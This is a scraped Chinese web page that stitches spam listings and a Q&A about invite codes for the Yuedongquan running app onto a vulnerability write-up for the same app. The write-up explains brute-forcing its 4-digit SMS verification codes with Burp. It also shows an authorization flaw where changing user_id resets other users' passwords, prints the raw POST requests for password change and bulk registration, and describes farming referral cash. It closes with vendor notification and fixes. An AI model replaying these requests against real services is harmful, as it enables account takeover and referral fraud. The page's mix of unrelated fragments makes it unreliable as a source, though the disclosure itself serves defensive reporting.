悦动职脉圈邀请码码9230272

悦动圈跑步官网-中国学网
悦动圈跑步官网
与【悦动圈跑步官网】相关信息:&&&&&&&&&&&&&&&&
用户还关注
12345678910
大类导航: |悦动圈跑步红包-中国学网
悦动圈跑步红包
与【悦动圈跑步红包】相关信息:&&&&&&&&&&&&&&&&
用户还关注
12345678910
大类导航: |谁有悦动圈跑步邀请码_百度知道
谁有悦动圈跑步邀请码
您的回答被采纳后将获得:
系统奖励20(财富值+经验值)+难题奖励30(财富值+经验值)
我有更好的答案
不需要邀请码, 直接下载安装,微信账号登陆就可以了。
9294192谢谢
其他类似问题
为您推荐:
悦动的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁悦动圈某逻辑漏洞及解决方案
今天更新了一下悦动圈安卓版APP。之前只是扫描了下接口,那么这次我就用自己手机注册吧~接收短信时,发现是4位验证码,问题大了。那么就可以&爆破&任意注册和任意找回密码了?说干就干~
002x准备工作
手机连接WIFI,修改代理,打开神器burp。
任意注册一个账号,点击发送短信后,输入任意4位验证码,抓包开始爆破注册
然后设置验证码部分为playload~
成功和失败的截图如下,返回的长度不同,乱码部分为中文 提示验证码错误
004x拿到正确的验证码,直接在burp中更换为正确的验证码,进入下一步。这里显示注册成功~标记部分为unicode编码~
005x可以通过这个办法注册账号,那么就可以修改密码了~整个修改密码的过程和上面的一样就不再赘述。
其实整个爆破过程不算顺利,在公司爆破2000次左右的时候就会被拉黑,等待好久才回再连上。
结束语:验证码4位给了很多爆破的机会,可以通过手机找回密码,但是整个app中用户的电话是不会显示的(至少我没找到那里显示了,除非?)
真以为这里就结束了?好戏在后面~
001x新的开始
在注册的时候,发现可以填写邀请码,而且有红包。经过尝试邀请码为用户ID,那么批量注册不就可以刷钱了吗?但是爆破注册成本太高了。
002x换思路
在测试中,我试了下能否越权操作。发现只需要修改user_id,即可返回200。通过修改用户名称证实了这一点。全站通过修改user_id即可越权操作。正面图如下,注册了几个号这里修改此ID的用户名为 &悦动圈跑步&,放两张图。user_id不同~
这个图是burp抓包时的截图
003x思路拓展
不想做爆破注册,既然有越权操作的user_id,那么任意修改他人密码和个人资料,回复他人信息等都再话下。这里只需要修改用户ID和一次的密码即可重置任意人的密码~
POST /sport/modify_user_info?user_id=用户ID&passwd=MD5一次加密&ver=2.6.1.2&client_user_id=用户ID&channel=channel_office&sign=HeD4p3PzMrrguka%2FGT6bdeiuSF4%3D HTTP/1.1
Accept: application/json
Connection: Close
User-Agent: Dalvik/1.6.0 (L U;
4.4.2; PE-UL00 Build/HuaweiPE-UL00)
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
004x思路延伸
既然如此,在注册的最后一步抓个包,修改不同注册手机直接post,返回正常。已经达到批量注册,外加上邀请码了~可以开心的刷钱了~
POST /sport/register?phone=注册手机&passwd=MD5一次加密&nick=用户昵称&sex=0&device_id=696&invite_user_id=邀请码(其实就是用户id)&ver=2.6.1.2&phone_type=手机型号&sdk=19&os=4.4.2&source=android_app&client_user_id=XXXXX&channel=channel_office&sign=nqp8yx279b4sv%2BZtPt%2Fq%2Fzg3H6M%3D HTTP/1.1
Accept: application/json
Connection: Close
User-Agent: Dalvik/1.6.0 (; U; Android 4.4.2; PE-UL00 Build/HuaweiPE-UL00)
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
001x批量注册成功的信息,外加上返回的user_id。
002x登录邀请码(user_id)的这个账号上面看看去~
通过批量邀请注册刷的钱~
可体现和购物
003x这下真没有了~
批量注册的账号信息等,已经直接联系厂商处理了。钱是刷了10块钱,但是一分钱也没花。
解决方案:
1、验证码位数太短,容易被爆破。建议验证码设置为6位、复杂或者增加有效期等.
2、越权操作
3、最后的就是批量注册和修改任意账户密码(修改密码找不到手机号,利用条件有限)~
您对本文章有什么意见或着疑问吗?请到您的关注和建议是我们前行的参考和动力&&
您的浏览器不支持嵌入式框架,或者当前配置为不显示嵌入式框架。

我要回帖

更多关于 悦动圈跑步 的文章

 

随机推荐